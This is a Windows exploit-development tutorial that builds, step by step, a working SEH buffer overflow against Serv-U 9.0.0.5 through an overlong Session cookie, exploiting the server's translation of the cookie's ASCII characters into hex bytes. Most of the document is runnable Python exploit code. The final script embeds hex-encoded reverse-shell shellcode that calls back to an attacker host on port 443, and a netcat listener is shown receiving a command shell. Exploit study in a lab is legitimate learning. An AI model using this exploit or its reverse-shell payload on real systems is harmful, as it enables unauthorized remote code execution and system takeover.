Windows Buffer Overflow Tutorial: Dealing with Character Translation

Introduction

This is the third entry in my series of buffer overflow tutorials.

In case you missed them, here are entries one and two. These tutorials are designed to build upon skills taught in each of the preceding tutorials, so I recommend that you complete the first two before you attempt this one.

In this entry we will be doing another SEH Stack based overflow, however in this case our buffer will be translated into a hexadecimal value in memory at the point where the SEH overflow occurs.  This requires us to structure our buffer slightly differently, and also requires us to use a different method to find our SEH overwrite offset.

The vulnerable application we will be using is Serv-U 9.0.0.5, which has an exploitable vulnerability related to its handling of overly long Session cookie values.

Warning! Please note that this tutorial is intended for educational purposes only, and you should NOT use the skills you gain here to attack any system for which you don't have permission to access. It's illegal in most jurisdictions to access a computer system without authorisation, and if you do it and get caught (which is likely) you deserve whatever you have coming to you. Don't say you haven't been warned.


Required Knowledge

To follow this tutorial you will need to have basic knowledge of:
  • TCP/IP networking,
  • management of the Windows Operating System (including installing software, running and restarting services, connecting to remote desktop sessions, etc), and
  • running Python scripts.

You need to have good enough knowledge of the attacking system you use (whether it be BackTrack, another type of Linux, Windows or anything else) to be able to run programs and scripts as well as transfer files.

Knowledge of basic debugger usage with OllyDbg, including the ability to start and attach to programs, insert breakpoints, step through code, etc, is expected. This is covered in my first tutorial.

I will also expect at this stage that you know how a SEH Based Buffer Overflow exploit is achieved.  This is covered in my second tutorial.

Python programming skills and knowledge of Metasploit usage are a bonus but not required.


System Setup

In order to reproduce this exploit for the tutorial, I used a victim system running Windows XP SP2, and a attacking system running BackTrack 4 Final.

You don't need to reproduce my setup exactly, but I would suggest sticking to Windows XP SP2 or earlier for the victim system. The attacking system can be anything you feel comfortable in, as long as it can run the software I have specified below, and as long as you are able to translate the Linux commands I will be listing below into something appropriate for your chosen system.

If required, you can get a XP SP2 Virtual Machine to use as your victim by following the instructions in the Metasploit Unleashed course, starting in the section "02 Required Materials" - "Windows XP SP2" up to the section entitled "XP SP2 Post Install".

Your victim system must also use a X86 based processor.

In this tutorial my attacking and victim systems used the following IP Addresses. You will need to substitute the addresses of your own systems where ever these addresses appear in the code or commands listed below.
  • Attacker system: 192.168.20.11
  • Victim system: 192.168.10.27

The two systems are networked together and I have interactive GUI access to the desktop of the victim system via a remote desktop session. You will need to be able to easily and quickly switch between controlling your attacking system and the victim system when following this tutorial, and you will need to be able to transfer files from your victim system to the attacking system, so make sure you have things set up appropriately before you proceed.


Required Software on Attacking and Victim Systems

Your attacker and victim systems will need the following software installed in order to follow this tutorial. By using BackTrack 4 Final for your attacking system you will take care of all the attacking system prerequisitites.

The attacking system requires the following software:
  • Python interpreter
  • Metasploit 3.x
  • Text Editor
  • Netcat

The victim system requires the following software:

For this particular exploit, we need to send a rather large buffer to the vulnerable application, so ensure that the network between the two systems is reliable.  If you are having issues reproducing the exploitable crash, the networking layer could be causing the problem.  Confirm that you are not getting RST packets from the victim system while sending the malicious HTTP request if you can't make the application crash.  If this is the case then you will need to troubleshoot the problem at the network layer.

Serv-U also doesn't give you an obvious error when it isn't listening on port 80 because some other application has already bound to that port.  Confirm the process that is listening on port 80 by using the following commands:

Check the output of the following for the process listening on port 80 and note its process ID (PID):

netstat -ano

Match the PID listening on port 80 with its process name using the output from the below and ensure that the Serv-U.exe process is the one listening on port 80:

tasklist

Ensure that all required software is installed and operational before you proceed with this tutorial.


Attaching the Serv-U Application to a Debugger

I have covered the process of attaching a vulnerable application to a debugger extensively in my last two tutorials, so I will just provide a very brief overview of the process here.

The process that you want to attach to in OIllyDbg is named Serv-U.exe, and by default it will be installed as a Windows service named "Serv-U File Server".  Stop and start the process by using the Services Control Panel option, and use OllyDbg to attach to the process once it is running.

As before, you will need to restart the vulnerable process and reattach to it in the debugger each time you want to reproduce the exploitable crash.


Triggering the Exploitable Crash

After checking the POC in the original advisory, looking at other examples of the exploit, and one other advisory, I discovered that the exploitable crash can be reproduced by sending an overly long Session cookie to the Serv-U application in a HTTP Post request.

After some trial and error involving sending different buffer sizes to the Serv-U application, and viewing the structure of the stack in the debugger, I eventually settled on a Session cookie size of 96000 bytes as being optimal for exploitation.  I won't reproduce the entire process I used here, because it makes for pretty boring reading, but it basically involved modifying the size of the buffer sent, and confirming that the SEH Handler on the stack was overwritten and that there was space inside our sent buffer after the SEH Handler.  The second criteria is not absolutely necessary, but it makes exploitation slightly easier.

Since the crash is triggered by a Session Cookie sent in a Post request, we can essentially trigger it via sending the following to port 80 on the target system:

POST / HTTP/1.1
Host: Hostname
Cookie: Session=[96000 characters]

A skeleton exploit that will trigger the crash by sending a long string of "A" characters (the ASCII representation of a byte value 0x41) is shown below:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer= "\x41" * 96000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

When we trigger this crash we will get an access violation, and if we check the SEH Chain (View->SEH Chain menu option) we see that it has been overwritten with 'AAAAAAAA'.



This is unusual, because we sent the application a buffer full of 0x41 bytes, and if the SEH Handler had been overwritten from our buffer we would normally expect to see a value of 41414141, or four lots of 41.  Instead, each byte that makes up the the SEH Handler overwrite has the value 'AA'.

It looks as though the ASCII representation of the bytes we have sent (which is 'A' for 0x41), have been converted to a hexadecimal nibble (half a byte) so that the value of two of the bytes we have sent are now represented in a single byte in memory. 

Lets further test this theory by sending some different values in our buffer and checking to see how they are represented in memory when the application crashes.

Lets try sending 'abcd' (lower case) to the application.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="abcd" * 24000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

At the time of this crash, the SEH Handler points to CDABCDAB.




The 'abcd' has been translated to hexadecimal ABCD, apparently that fact that our ASCII string was lower case didnt stop this Hexadecimal translation from occurring.  Lets try 'fghi'.  (For the next few examples to conserve space I will only show the lines of code I changed)

buffer="fghi" * 24000

This time the SEH Handler points to Crash points to 000F000F.  The lowercase 'f' was converted to a Hexadecimal F, and the 'ghi' characters, which don't have a Hexadecimal equivalent, were converted to 0.

Lets try one more - 'efgh'.

buffer="efgh" * 24000

This time the SEH Handler points to 00EF00EF.  So ASCII characters A-F, regardless of case, are translated to hexadecimal values A-F, and any other character converts to a 0.

Lets do a check with numbers '0123' to confirm our Hexadecimal theory.

buffer="0123" * 24000

This time, the SEH Handler value is 23012301.  So our ASCII string of characters that we send to the application in the Session cookie is interpreted as a Hexadecimal value in the memory buffer that overwrites the SEH Handler.


Finding the Overwrite Location

In the previous two tutorials, we found offset values within our buffer via using the Metasploit pattern_create.rb script.  This method is not going to work in this case however, because the Metasploit script uses characters outside of the 0-9, A-F range, and it uses both uppercase and lowercase characters.  Any of these out of range characters will be translated to a 0, or the case information for the A-F characters will be lost, and this will prevent us from being able to provide the correct input value to pattern_offset.rb to find the offset.

We will have to use a different method to find the overwrite location.  Knowing that characters 0-9 and A-F will be represented in the memory display we see in the debugger, we can use a set of structured buffer made up of these characters only to narrow down the exact overwrite location.

Given that we have 16 characters we can use, we first break the buffer of 96000 into 16 x 6000 character blocks.  Then, based on what the overwrite value of the SEH Handler is, we will know which 6000 character block our overwrite occurs in.  The following code will do this for us:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer = ""

for i in range(0, 16):
    buffer += hex(i)[2:].upper() * 6000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

When we run this exploit, the value of the SEH Handler is set to DDDDDDDD.  If you want to, you can confirm that the buffer is structured as expected by right clicking on the SEH Handler Value in the SEH Chain window and selecting Follow address in stack. 



On the stack you should be able to see that the SEH Handler sits within a large buffer of D values (with the exception of some minor mangling just before the SEH Handler).



This means that our overwrite occurs in the 'D' section of our buffer.  This gives us a range of 78000 and 84000 where our overwrite location sits, given that 0xD x 6000 is 78000 and 0xE x 6000 is 8400.

Now lets narrow this down further.  6000 divided by 16 is 375.  Lets create a buffer of mostly 'A' characters, but lets put a block of 6000 characters made up of an even distribution of values 0-9 and A-F (375 of each) between bytes 78000 and 84000.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 78000

for i in range(0, 16):
    buffer+=hex(i)[2:].upper() * 375
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

The next value of the SEH Handler is AAAAAAAA.  This means that the overwrite occurs between bytes 3750 (0xA x 375) and 4125 (0xB x 375) within our 6000 byte buffer, or between bytes 81750 (3750 + 78000) and 82125 (4125 + 78000) within the total buffer.

If we check the overwrite location on the stack we can see the 'B' values starting a little bit below the block of 'A' values that have overwritten our SEH Handler, so we know that we are within our 6000 mixed block.




Lets narrow it down once more.  375 doesn't divide evenly by 16, so we will use a block of 24 sets of 0-9 and A-F characters, making for a total block of 384.  As long as we completely cover the 375 character space that we know our overwrite location sits within, it doesnt matter if we go a bit over.  We insert this set of mixed characters into the 375 byte window where we know our overwrite location sits - sometime after byte 81750.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81750

for i in range(0, 16):
    buffer+=hex(i)[2:].upper() * 24
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

This again gives us a SEH Handler value of AAAAAAAA and when we check the stack we can see that the SEH Overwrite occurs after the tenth A character, and the pointer to the next SEH record (the 4 bytes immediately before the SEH overwrite) also has the value AAAAAAAA, and occurs after the second A character.



From this we can actually work out the exact overwrite address.  For the pointer to the next SEH record it is 2 + 240 (0xA x 24) + 81750 = 81992.

Lets restructure our skeleton exploit and see if the SEH Handler is overwritten by the expected value of CCCCCCCC.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="BBBBBBBB" # Next SEH pointer
buffer+="CCCCCCCC" # SEH Overwrite
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

Success!  We get a value of CCCCCCCC in the SEH Handler.


Finding a SEH Handler Overwrite Address

Now that we know the exact offset of the SEH Handler overwrite within our buffer, we need to find an appropriate address that can allow us to gain control of code execution via the Windows error handling routines.

As discussed in my previous tutorial on SEH Buffer Overflow exploitation, we need to find a module loaded by the application that hasnt been compiled with the /SafeSEH ON option AND which hasn't disabled all addresses in that module being used as SEH Handlers by using the IMAGE_DLLCHARACTERISTICS_NO_SEH flag.

As it did in the last tutorial, the OllySSEH Ollydbg Plugin crashed for me again, so Im doing things the slightly harder way once more.

I checked the list of loaded modules in OllyDbg (View->Executable Modules menu option) and looked first for a third party module loaded with the application.




As mentioned in my previous tutorials, a third party module (in other words one provided with the application itself) has the benefits of usually being compiled without the /SafeSEH ON and IMAGE_DLLCHARACTERISTICS_NO_SEH options, making it suitable for use with SEH overwrite exploits.  It also provides a stable overwrite location that should work across multiple Operating Systems, since dlls provided with the application should be identical and should be loaded from the same base address on different systems.

Looking at the list I picked the first module provided with the Serv-U application that did not have a leading zero byte in the base address - libeay32.dll.  I picked a module without a leading zero byte because zero bytes usually break buffer overflows, however it turns out in this case this doesn't actually matter because the character conversion that occurs creates each byte that appears in memory from two ASCII characters sent from our exploit.  This means that we can actually create a zero byte in memory if we wish by using two ASCII zeros (\x30), effectively giving us no bad characters in this exploit!

Lets transfer this file to our attacking system and analyse it with msfpescan to confirm that it doesn't have the compiler options set that would make it unsuitable for use in providing a SEH Overwrite address.

user@bt:/tmp$ msfpescan -i libeay32.dll | grep -E '(DllCharacteristics|SEHandler)'
DllCharacteristics           0x00000000

Remember that If we see any SEHandler entries, it means that a SEH Handler exists in the dll and that the module was compiled with /SafeSEH ON.  We see no such entries here, so we are safe on this count.

In the DllCharacteristics value, we want to confirm that the third byte from the left does not have the '4' bit set to confirm that the module does not have the IMAGE_DLLCHARACTERISTICS_NO_SEH flag set.  If the value of the third byte (the one marked by 'X' in 0x00000X00) is not '4, 5, 6, 7, C, E or F' (in other words if the '4' bit or 00000100 is not on), then the module does not have this flag set.  The third byte does not have the 4 bit set, so we are safe on this count as well.

Now lets proceed with finding an appropriate overwrite address in libeay32.dll.  As discussed in my SEH Buffer Overflow tutorial, to take control of code execution, we can enter into our buffer by using a RETN instruction on the third value on the stack at the time that the initial exception is handled using the Structured Exception Handler.  To do this we look for a POP, POP, RETN instruction in libeay32.dll. 

View the code of libeay32.dll in OllyDbg (right click on it in the Executable Modules window and hit Enter or right click and select View code in CPU), and right click in the CPU pane and select Search for->Sequence of commands.

Enter the following commands to be searched for and hit Find:

POP r32
POP r32
RETN

Like so:




I found my a POP, POP, RETN instruction at 0FB010C1 in libeay32.dll which I will use to overwrite the SEH Handler to gain control of the CPU.





Making use of the Character Translation to Gain Control of Code Execution

Now if you remember from my first SEH Overflow tutorial, running the POP, POP, RETN instructions takes us into our buffer four bytes before the SEH Handler address.  What we want to do to give us some usable buffer space to work in is to jump over the overwritten SEH Handler to the uninterrupted buffer space beyond.  A JUMP SHORT 6 instruction will achieve this for us, but remember that we cant just enter the \xeb\x06 into our buffer directly because of the character translation to Hexadecimal.  What we need to do is instead enter the ASCII equivalent of "EB06" and let the Hexadecimal translation convert this for us to the byte equivalent.

We also need to ensure that when we enter the overwrite location we take into account the little endian order of the x86 CPU, so we enter the overwrite location of 0FB010C1 as "C110B00F".  Lets see the skeleton exploit:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="EB069090" # Next SEH pointer \xeb\x06 JUMP SHORT 6, \x90\x90 NOP Padding
buffer+="C110B00F" # SEH Overwrite 0FB010C1 POP EBX, POP ECX, RETN libeay32.dll
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

If you set a breakpoint on the SEH Handler address and run this exploit, after you pass the exception through to the application to handle using the Shift + F9 keys, you should now be able to step execution through to the area of the buffer after the SEH Handler using the F7 key.

Remember that to set a breakpoint you can either select the address in the CPU pane and hit F2 or just hit F2 on the entry on the SEH Chain window once the crash has been triggered.


Adding the Shellcode

Now we have control of the CPUs execution path, we need to add some shellcode to our exploit so it will do something useful.  Again, we won't be able to directly add the bytes of the shellcode directly to our exploit, we will need to convert them to ASCII characters first.

This command below will generate some reverse shell shellcode, and convert it to a workable format that can be easily pasted into our exploit.

user@bt:~$ msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | xxd -ps | tr 'a-f' 'A-F' | sed 's/0A$//' | sed 's/$/"/' | sed 's/^/"/'
"FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF"
"31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885"
"C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D"
"01C738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B"
"048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D683332000068"
"7773325F54684C772607FFD5B89001000029C454506829806B00FFD55050"
"50504050405068EA0FDFE0FFD589C768C0A8140B68020001BB89E66A1056"
"576899A57461FFD568636D640089E357575731F66A125956E2FD66C74424"
"3C01018D442410C60044545056565646564E565653566879CC3F86FFD589"
"E04E5646FF306808871D60FFD5BBF0B5A25668A695BD9DFFD53C067C0A80"
"FBE07505BB4713726F6A0053FFD5"

An explanation of what this command is doing may be helpful.  We run msfpayload using the R option to provide the output in raw bytes, and we then pipe this into 'xxd -ps' to convert the binary output from msfpayload into the Hexadecimal representation of the values of each individual byte.  This is similar to what you would see in a Hex Editor and also similar to the C output format of msfpayload without the \x characters before each byte.

When then pipe this into 'tr 'a-f' 'A-F''.  This is not strictly necessary since the case of the A-F characters doesn't matter for the purpose of the Hexadecimal translation, Im just doing it to make what we enter visually match what appears in the debugger.

Then we pipe that into 'sed 's/0A$//'' which removes the trailing line feed character added by msfpayload.  We then pipe into 'sed 's/$/"/'' and 'sed 's/^/"/'' which adds double quotes to the end and start of each line for easier pasting into our exploit.

Lets see what the final exploit code looks like.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="EB069090" # Next SEH pointer \xeb\x06 JUMP SHORT 6, \x90\x90 NOP Padding
buffer+="C110B00F" # SEH Overwrite 0FB010C1 POP EBX, POP ECX, RETN libeay32.dll
#msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | xxd -ps | tr 'a-f' 'A-F' | sed 's/0A$//' | sed 's/$/"/' | sed 's/^/"/'
buffer+=("FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF"
"31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885"
"C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D"
"01C738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B"
"048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D683332000068"
"7773325F54684C772607FFD5B89001000029C454506829806B00FFD55050"
"50504050405068EA0FDFE0FFD589C768C0A8140B68020001BB89E66A1056"
"576899A57461FFD568636D640089E357575731F66A125956E2FD66C74424"
"3C01018D442410C60044545056565646564E565653566879CC3F86FFD589"
"E04E5646FF306808871D60FFD5BBF0B5A25668A695BD9DFFD53C067C0A80"
"FBE07505BB4713726F6A0053FFD5")
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

Now lets set up a listener:

user@bt:~$ sudo nc -nvvlp 443
listening on [any] 443 ...

And we run the exploit:

user@bt:~$ sudo nc -nvvlp 443
listening on [any] 443 ...
connect to [192.168.20.11] from (UNKNOWN) [192.168.10.27] 2767
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We have shell!  This completes this exploit.